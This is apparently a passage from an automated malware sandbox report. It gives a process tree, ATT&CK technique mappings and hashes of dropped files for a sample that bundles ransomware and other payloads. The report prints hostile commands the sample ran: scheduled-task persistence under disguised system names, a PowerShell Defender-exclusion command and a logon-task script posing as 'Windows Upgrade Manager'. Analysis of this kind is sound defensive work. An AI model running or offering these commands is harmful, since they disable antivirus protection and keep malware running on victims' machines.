    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\is-GM0HS.tmp\x2s443bc.cs1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-GM0HS.tmp\x2s443bc.cs1.tmp" /SL5="$401BE,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
      4⤵
      Executes dropped EXE
      PID:1664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1860738386-1080838504-1455916190-15774684881601392334-207356880518738300841511585071"
1⤵
PID:1572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Launches Equation Editor
PID:512
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE" -Embedding
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:840
- - C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE
    C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE -Embedding
    3⤵
    - Executes dropped EXE
    - Launches Equation Editor
    PID:1476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\msvcp100\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\wkssvc\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ghjkl" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghhjhjhsg\ghjkl.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3652

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8
1⤵
PID:2304

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5076

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:4852

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:5440

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240410085447.log C:\Windows\Logs\CBS\CbsPersist_20240410085447.cab
1⤵
PID:5316

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:5160
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:1108

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:2760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:2300

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:6056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Exploitation for Client Execution

T1203

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\DECRYPT-FILES.txt

Filesize
10KB

MD5
890e0e4a2a7d6921e9ef03dcf5784e11

SHA1
570ab93c55aac6089844ba8bd0c67cb8aa0a79d5

SHA256
d8a3021b8271aaf539d63d427ed2b6663bff9dce06befe260a422aa06dbe7133

SHA512
26093ec4cbc9675e70a7f535b91d9660c14852d3755de24bbeb245e942bf7f9b2ae55a4e441b20f2c729dedc912deefce69ecab30751b46e34ddf2e2397207c3

Download Submit
C:\MSOCache.Cyborg Builder Ransomware

Filesize
50B

MD5
5e7f31b8864daf89be5ce3ea61ed72df

SHA1
f25fea3042d87ce7b26d4319561bddfd56eec4ea

SHA256
edc8d36c2dedf83da5ca164c40b22d0299c2407133f5024c759b36e7f06dc542

SHA512
81b8a036d8b7cc943c05e97dd70f4e852aae0163a2beedd28270eb9286a73cabe6847449d73f260b2a6df25bf8d04c42ab678946473d5fcebf756b114d4525ab

Download Submit
C:\MSOCache\ALLUSE~1\{9A861~1\setup.exe

Filesize
1.1MB

MD5
566ed4f62fdc96f175afedd811fa0370

SHA1
d4b47adc40e0d5a9391d3f6f2942d1889dd2a451

SHA256
e17cd94c08fc0e001a49f43a0801cea4625fb9aee211b6dfebebec446c21f460

SHA512
cdf8f508d396a1a0d2e0fc25f2ae46398b25039a0dafa0919737cc44e3e926ebae4c3aa26f1a3441511430f1a36241f8e61c515a5d9bd98ad4740d4d0f7b8db7

Download Submit
C:\Program Files (x86)\Microsoft\DesktopLayer.exe

Filesize
111KB

MD5
47826f2614f1fa90601dc51e40d5c29e

SHA1
e9673510f232869a91280e4c2941f8aa2f8c5108

SHA256
947d28e57a71ab35c91b6c3efc01734191ac2a488985f2554aa5b980ee53f8be

SHA512
f7c115b4e8f378d30d83d4fe76771984f9fc9556133ffa8ada8ec52fdfcfe171b3f86be12dfd5a66bd6017551f94f08012e21c7f05d238d51e1fb8843d5db595

Download Submit
C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe

Filesize
55KB

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\ProgramData\HJJEHJJK

Filesize
92KB

MD5
daea01a1eeec41d1ef7acf350267d614

SHA1
2fbda195dd0ac5c5be1719443d534dea093a834f

SHA256
ed30a447244be6c2bb43bd0efd1ed61e627511eee767ff57b1c1e6d5fdc56c6b

SHA512
290e39bad325a9236b2378b3b66547e2606a02c1b4dd1c422ae240107c201f80f130bc3eefe130cfa975ca9b1a02b25f79218e3be08ef74995ed28d2a9378b78

Download Submit
C:\ProgramData\JECAFHJEGCFCBFIEGCAE

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@[email protected]

Filesize
1006B

MD5
c35fd61fcd79ef45582419467399a253

SHA1
525a6e4b14c1fc43842ca9673baab095e522301c

SHA256
acdab4e1263731415e38d1707c9ce3ffed8b047934598eac05b715fac737abea

SHA512
8504fa3f7ad202da0d28f4e02d0373f36484b6d85ed8b1e18d6a46c5519ef82fa6f8efad6d5b81c1c393115790a151b8a79e0f7790805cbe741ee25f40d05383

Download Submit
C:\ProgramData\system.exe

Filesize
37KB

MD5
e817d74d13c658890ff3a4c01ab44c62

SHA1
bf0b97392e7d56eee0b63dc65efff4db883cb0c7

SHA256
2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

SHA512
8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
6e4465be52c431f35075081c76f795c6

SHA1
dd2987643d62c0b15951d12044d61a2a33b35ed0

SHA256
859dccee4fe423eee742367460ca5780fef1b5b80aa5b0905d3d37c7c2069ede

SHA512
2154d44d1e3f5841eced051b74a64bd31dadefa5f6c9ab4bf0f7bf50076a53cf769f104dfa5e834cc7a28271326c5f918e3f8cf488ed18a26d166e714b0fb7af

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
67fbbef247a52e6780f7f9c0dc943f34

SHA1
3af4da5380584872c64b595616c9a6e0e8f972ce

SHA256
67c4bec173dc2f71d033a6d59fd12aafba0ca92a7c3575c2cc34f17d75ca070c

SHA512
44f969a706aab07de1382024a5ae8ba9d65bbc102a226946b2aea87eeca0d3e96ffe46ec40ff093676a8d9f5e8526512bbfc364acbe5a84a7cebf5070b728c66

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a8056698d557930ecb740c069c2a6df7

SHA1
ab284b1f7ec310ccd7374dc47739eb2d59412c4f

SHA256
07cbeca51680aeed35f6676ed41793878fb004be0c2edf9f7f815c1cf1a9c0c8

SHA512
5b002dfbd9bd32924f8f3c44a98970e66a2248e4ff62d22d05ee0615289ce77e9dec28e26949c1977432115141f164f4f9fffc18eac33a4539480b3fcfe9ff7e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
8d649eb57570b0cf2c615fb7400d0e91

SHA1
a320d75d165fd0cbe86d3971b3d03f15fd59450e

SHA256
7e7413326607348709bb291b3ad6339f2ebb864c63ebf3f956629af617e8cdd9

SHA512
a6a1d2363bb925f2ce102dd913b9da1f07cdf46ffefbd5251968f3a6a85f69e38dac00f9df64dc60d52461e1e26f10b2dc9fa4ed6d4cb35ae3ed498ba8ff77d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB1D2DCF.emf

Filesize
5KB

MD5
a08286784c9f2b367f405d02eeca6d49

SHA1
87d3842a4ff37e94e45428f2aefda1dd9ac5da47

SHA256
91ec41f1fbbb6769b0f1d9062384cafd742af6b2e0fc790b60ff24e1e9bfe2e3

SHA512
e67be2afd84074cc387c8ae1273440c99248c7dd99fb96ecb9161ace5602a57d46333b5cc165bf7de00fc03bb7a354fc4c668477bfd932df2559479bef77a5b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\elmshthtr.lbt

Filesize
3KB

MD5
597a65c4838edc8f1c409a4dcfaf6962

SHA1
1eeae9c0458c6d222feebdae58d2b04a6a74f973

SHA256
e2713fb7121f103dec75bfff876a2e862f48b0c2c81a172aecf954e5c2ae0a0e

SHA512
d129de7a84271c30bf39ffb7531bb394b67ba99484913f5e5fb60f75dec7e516ac8865207d2b78cc1dd246b405712608733b4b07670db37c8b143de8a0ddbf7c

Download Submit
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

Filesize
171KB

MD5
a4d60b143b5fcc68f86b929d73d1880d

SHA1
36e946b7d6dd02542e1d893abaa448aff43f1072

SHA256
7a55183d372c4645e8a31389d2813fa12c127389254b7412c225ec413c404044

SHA512
dd9562c3b9d4198d322f7db0d16b4dcdbf6abc6474faf4ed25f1bca88c69614c8dbaf4e51de61c208a7f9c261de3e6f1f530f245640d1315ee22b3b0642945ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

Filesize
1.8MB

MD5
52682404bb93f0b59fc16e225bef95b6

SHA1
d794ecb5e90c74a0ba6288968e381fa11f081301

SHA256
49c6e047269781d58617aca5e5d5246b6a0bfbe9defebe504210abc5d63309c0

SHA512
86928d3df1eb46704244e2998bc3761c3b2d9702f888d70147d4a9c07583958acc93255a04ca5cd096ac743b0924f7eb1cee062a7c35bf27c729938bdaff5c47

Download Submit
C:\Users\Admin\AppData\Local\Temp\1268714394.exe

Filesize
8KB

MD5
80f97c916a3eb0e5663761ac5ee1ddd1

SHA1
4ee54f2bf257f9490eaa2c988a5705ef7b11d2bc

SHA256
9e06f61d715b1b88507e3e70390721ab7ab35d70fe2df6edaaf0e565783e7d2f

SHA512
85e30cfc5c02543820f884602701986aa1e40d587da13c35b76b80dc95c0d6b3e18f5b0ad083fcfa3e9b92935306e4f8faec36ac28ac25e53fb03dcba4a092a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2145228497.exe

Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

Filesize
701KB

MD5
cb960c030f900b11e9025afea74f3c0c

SHA1
bbdcad9527c814a9e92cdc1ee27ae9db931eb527

SHA256
91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99

SHA512
9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

Download Submit
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

Filesize
413KB

MD5
d467222c3bd563cb72fa49302f80b079

SHA1
9335e2a36abb8309d8a2075faf78d66b968b2a91

SHA256
fedb08b3ec7034a15e9dee7ed4dec1a854fb78e74285e1ee05c90f9e9e4f8b3e

SHA512
484b6c427e28193ddb73dd7062e2bfbd132ddc72ce4811bfe08784669de30e4b92bc27140373f62a4ce651401000a3c505188620c43da410bf6b0799a0791fa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\674132759.exe

Filesize
21KB

MD5
837d57d98e4afcbe2aa6210240a02c8e

SHA1
56e96962a306a3d5bec484d13a88bcb516ebbca9

SHA256
c72da8d9d76f3ce218c1e072b6752590c7b9fd977acac39a2f0b88d906fa401d

SHA512
58a515bbe9626da5c233fef471278ee79fa517648ff4e95cf9fc221d1215afd6c91d32db0171397940f0935ff230706f1ef3c1284ab4bcdc3c3e1632a4277cbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\71519988.exe

Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Users\Admin\AppData\Local\Temp\7955.tmp\7965.tmp\7976.bat

Filesize
49B

MD5
76688da2afa9352238f6016e6be4cb97

SHA1
36fd1260f078209c83e49e7daaee3a635167a60f

SHA256
e365685ea938b12790a195383434d825f46c41c80469ce11b9765305780bff7a

SHA512
34659bf4de5c2cbd7cdc7309a48880ac2e1f19e0a4da0c1d4cc45658a81f9f4e7a9293be48e853de812a6b94e1caa3356a715a1a0c14d37b7ae99ba5888bd1df

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA92D.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe

Filesize
1.4MB

MD5
04055601abbd16ec6cc9e02450c19381

SHA1
420bd7c7cad59f1b7cdd2c8a64282ef6f06cfe6e

SHA256
b7620bff5539ff22c251c32e62961beae4f5a91b0f6c73dde1a7da941b93fe13

SHA512
826c13cf6a37c561fb9052b3a0a7424df7d2fe424fe8c3783440c4483aa46a2cf1e4c275c7c080a130e178c7ac3221bb9224126ef4ab0bee38c24b12fa2a70ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\180871712738544.bat

Filesize
356B

MD5
56bda98548d75c62da1cff4b1671655b

SHA1
90a0c4123b86ac28da829e645cb171db00cf65dc

SHA256
35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead

SHA512
eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
313KB

MD5
fe1bc60a95b2c2d77cd5d232296a7fa4

SHA1
c07dfdea8da2da5bad036e7c2f5d37582e1cf684

SHA256
b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

SHA512
266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
1.4MB

MD5
63210f8f1dde6c40a7f3643ccf0ff313

SHA1
57edd72391d710d71bead504d44389d0462ccec9

SHA256
2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

SHA512
87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup6.exe

Filesize
451KB

MD5
8e03c477ad1c701c47ed0515c8ea6ed3

SHA1
197b5d7a5552dd93420cb2c8688fa83917e780a4

SHA256
050dda51f0c39d1fc616fdcbe5b4584d17cae1b5ab158ad405407ddf414c59b4

SHA512
1a3262d42d1849d47ba09218dbd291d17c8d198d44d97605753c77ea296db33d27f658f6e5f080e7b236208e7d6a7314e3ab01d1d686bf2580fb3710f8479a88

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OSM-Client.exe

Filesize
18.9MB

MD5
ed80683776e68c6c237175c3ce9f39d5

SHA1
6bd0d39e01e74d4e7a61fd48d32e8df1861b0c34

SHA256
cbecca01a711d72f666729e0f256c2d6b808b71feb76bd0a34146cd41b7edc23

SHA512
d857b9c20896c548de1e7cf1074a3f619d01a8ecfdb578d68807d01c30662a18f8b6b07aadd5f1ce463c877df1a4bf5aa12c18ed22ed622343c38e27936fcc38

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OSM-Client.exe.zip

Filesize
6.4MB

MD5
8b54e0f462da0688c6a69525da5d952b

SHA1
97ff0d8f7d9df4649839fad119d2d867cbaadd77

SHA256
39ad95c3bada4cedbe8278169e1cbac7980d7582d9b384142ffed61df0930c54

SHA512
938b6f8f52812d200834d56081f2f6fddf503704d42aa7dcd790747c840cee13eb4bc24696e6500ca80e8e1bf897bbd55abfeb7051e3e12c7d411efd3171fe24

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe

Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe.mini

Filesize
249KB

MD5
1e25cbe9f94e6b722ee51aae680f5510

SHA1
74cf67380449e0d81ba5c15a43ea7fdf703ba7ef

SHA256
152704e13aba56bccb1183992109216ee3c2d007dfe123ff5762955ecd3b8f00

SHA512
5bbbb5a1d643b1251ea0dcf4a609e448b4cd91bcb36e737810e48f989954cb243905798eb2c0fbb05ded4f18fc49a92d0330ec981dadc7d5a13ff17ffa04cf8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\move.bat

Filesize
156B

MD5
cfa0da234e0434f0a9b092989956227e

SHA1
138abe1853d92bca4869b481087f627dd557229f

SHA256
18d5ef0656e401c842a0eb28ff3bc1e46887e7631eea747c6ae773538c13ed40

SHA512
95da985ab1ea9ab1ab264b7b799a19e784dcc15e2369a771b49f31dbfd1649a9940ad241c7e89ea4e0d1b96ed8e91ba48ef816431731218fffcad03972909f93

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico

Filesize
5KB

MD5
93e4504d4c585cfda1979b37e75fe39a

SHA1
5d4296f36e878b263c5da6ad8abd6174e4dff5d8

SHA256
69aaab4b888c83b3f77d524313f9383d9edaa73e4af111a7a637e9f84a1609d7

SHA512
072638bee318f5e15af53cf3f9efd9156aa4836c40e8fb5f1f856706331cb11b528dfebe8e88713fc7146fefb1e66a614cff2f4e87676d886d2f09d945cbd1a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico

Filesize
1KB

MD5
74fdac19593602b8d25a5e2fdb9c3051

SHA1
81db52e9ad1be5946dffa3c89f5302633a7698d2

SHA256
f06ebef0b912b94d7e0af3915f2a6b6b64f74cb60bc8aaa1104c874761a0dee6

SHA512
8ffb507e46c99f1fede3f12c14998cd41afa8cfc5c815756343041f1bef6faf7ba4429cebeb87b0fb807d911f5516d235d5f893e519576b1fb675d25d025c21b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe

Filesize
310KB

MD5
acdcda1289e2ac839896011fc6bb7971

SHA1
78ce68728577ea586fc24c7b0a86a6ee32ba47be

SHA256
396c31573b8ea83c3c5007f694176269ef6504143d04552063d97a3214c48084

SHA512
7475a4e84b6f947c7cde9d9b0ab34201076f0515ac5f2523ca7dfcb8827a738c8260d4223506959a56ef1ac926f820248e818cad1a40628aa97fcfdae26197e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

Filesize
5.8MB

MD5
637e757d38a8bf22ebbcd6c7a71b8d14

SHA1
0e711a8292de14d5aa0913536a1ae03ddfb933ec

SHA256
477c13d4ca09fdb7fea6487641c6a904d4dee1adecd74ac42e0b00a3842503f9

SHA512
e7a3576370967a4cbd53c33bf65ae26881cca3f713df5bdbcdc9ed76b79e9102c26d5bf940fc2a0e880c7b7ab83c13dcad24608d23981cbcaf551d4e800c67ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

Filesize
780B

MD5
93f33b83f1f263e2419006d6026e7bc1

SHA1
1a4b36c56430a56af2e0ecabd754bf00067ce488

SHA256
ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

SHA512
45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
